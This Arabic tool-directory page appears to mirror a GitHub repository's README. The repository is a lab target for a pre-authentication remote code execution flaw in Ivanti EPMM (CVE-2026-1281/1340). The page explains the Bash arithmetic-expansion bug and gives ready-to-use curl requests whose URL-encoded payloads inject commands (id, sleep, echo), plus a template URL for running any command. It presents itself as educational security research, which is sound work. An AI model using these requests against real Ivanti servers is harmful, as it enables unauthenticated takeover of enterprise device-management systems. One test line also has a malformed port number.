Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

تطبيق تجريبي بسيط يوضح كيفية إعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة في Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) لأغراض تعليمية وبحوث أمنية.

عرض المستودع
3منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هدف Ivanti EPMM RCE قبل المصادقة التجريبي

تطبيق تجريبي بسيط يوضح كيفية إعادة إنتاج ثغرة Ivanti EPMM RCE قبل المصادقة (CVE-2026-1281 / CVE-2026-1340) لأغراض تعليمية وبحوث أمنية.

نظرة عامة على الثغرة

تستغل هذه الثغرة سلوك التوسع الحسابي في Bash. عندما يُستخدم متغير يحتوي على مرجع لمتغير آخر في سياق حسابي، وكان المتغير المُشار إليه يحتوي على فهرس مصفوفة مع استبدال أوامر، يتم تنفيذ الأمر.

سلسلة الاستغلال

  1. يحتوي الطلب على st=theValue (سلسلة حرفية "theValue" مع حشو)
  2. يحتوي الطلب على h=gPath[\command`]` (أمر في فهرس مصفوفة)
  3. يقوم سكربت Bash بتحليل أزواج المفتاح=القيمة في حلقة، محدّثاً theValue في كل تكرار
  4. يتم تعيين gStartTime إلى السلسلة الحرفية "theValue"
  5. بعد الحلقة، يحتوي theValue على command`]`
gPath[\
  • عند تقييم [[ ${currentTime} -gt ${gStartTime} ]]:
    • ${gStartTime} → "theValue" (سلسلة)
    • يعامل السياق الحسابي theValue كمرجع متغير
    • theValue → gPath[\command`]`
    • يؤدي فهرس المصفوفة إلى استبدال الأوامر → RCE!
  • بدء سريع

    root@kitploit:~
    # بناء وتشغيل الحاوية
    docker-compose up --build -d
    
    # التحقق من أنها تعمل
    curl http://localhost:8180/health
    

    اختبار الثغرة

    1. اختبار إنشاء ملف

    أنشئ ملفاً لإثبات تنفيذ الأوامر:

    root@kitploit:~
    # الحمولة المشفرة بعنوان URL: id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # تحقق من إنشاء الملف
    cat artifacts/poc
    

    2. اختبار قائم على الوقت

    تحقق باستخدام أمر نوم:

    root@kitploit:~
    # يجب أن يستغرق الرد حوالي 5 ثوانٍ
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. تنفيذ أوامر مخصصة

    root@kitploit:~
    # كتابة محتوى مخصص
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    بنية URL

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ الحمولة: gPath[`COMMAND`]
                                   │      │              └─ الطابع الزمني النهائي (أي 10 أرقام)
                                   │      └─ حرج: "theValue" الحرفية + مسافتان (10 أحرف إجمالاً)
                                   └─ فهرس المفتاح (أي قيمة)
    

    تصحيح الأخطاء

    root@kitploit:~
    # عرض سجلات الحاوية
    docker-compose logs -f
    
    # الحصول على قشرة داخل الحاوية
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # التحقق من سجلات أخطاء nginx
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    التنظيف

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    المراجع

    • مقال مدونة WatchTowr Labs

    إخلاء مسؤولية

    هذا لأغراض تعليمية واختبارات أمنية مصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

    تنزيل الأداة